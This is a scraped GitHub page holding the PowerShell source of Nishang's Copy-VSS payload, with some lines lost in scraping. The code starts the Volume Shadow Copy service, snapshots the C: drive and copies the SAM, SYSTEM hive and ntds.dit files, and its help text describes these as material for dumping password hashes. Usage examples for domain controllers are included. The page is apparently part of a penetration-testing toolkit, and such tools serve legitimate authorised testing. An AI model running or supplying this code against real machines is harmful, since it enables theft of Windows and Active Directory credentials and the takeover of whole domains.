Skip to content
Go to file
Cannot retrieve contributors at this time
84 lines (69 sloc) 2.38 KB
function Copy-VSS
Nishang Payload which copies the SAM file (and ntds.dit and SYSTEM hive if run on a Domain Controller).
This payload uses the VSS service (starts it if not running), creates a shadow of C:
and copies the SAM file which could be used to dump password hashes from it. If the script is run on a Domain Controller, ntds.dit and SYSTEM hive are also copied.
The script must be run from an elevated shell.
The default path used for SAM is C:\Windows\System32\config\SAM, for SYSTEM hive it is C:\Windows\System32\config\SYSTEM and for
NTDS.dit it is C:\Windows\system32\ntds.dit. Sometimes the ntds.dit is present in other locations like D:\NTDS or C:\Windows\NTDS and so on.
Use $ntdsSource variable to provide the directory.
The path where the files would be saved. It must already exist.
PS > Copy-VSS
Saves the files in current run location of the payload.
PS > Copy-VSS -DestinationDir C:\temp
Saves the files in C:\temp.
PS > Copy-VSS -DestinationDir C:\temp -ntdsSource D:\ntds\ntds.dit
Code by @al14s
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[Parameter(Position = 1, Mandatory = $False)]
$service = (Get-Service -name VSS)
if($service.Status -ne "Running")
$id = (Get-WmiObject -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume = (Get-WmiObject win32_shadowcopy -filter "ID='$id'")
$SAMpath = "$pwd\SAM"
$SYSTEMpath = "$pwd\SYSTEM"
$ntdspath = "$pwd\ntds"
if ($DestinationDir)
$SAMpath = "$DestinationDir\SAM"
$SYSTEMpath = "$DestinationDir\SYSTEM"
$ntdspath = "$DestinationDir\ntds"
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath
cmd /c copy "$($volume.DeviceObject)\$ntdsSource\ntds.dit" $ntdspath
cmd /c copy "$($volume.DeviceObject)\windows\system32\ntds.dit" $ntdspath
if($notrunning -eq 1)
You can’t perform that action at this time.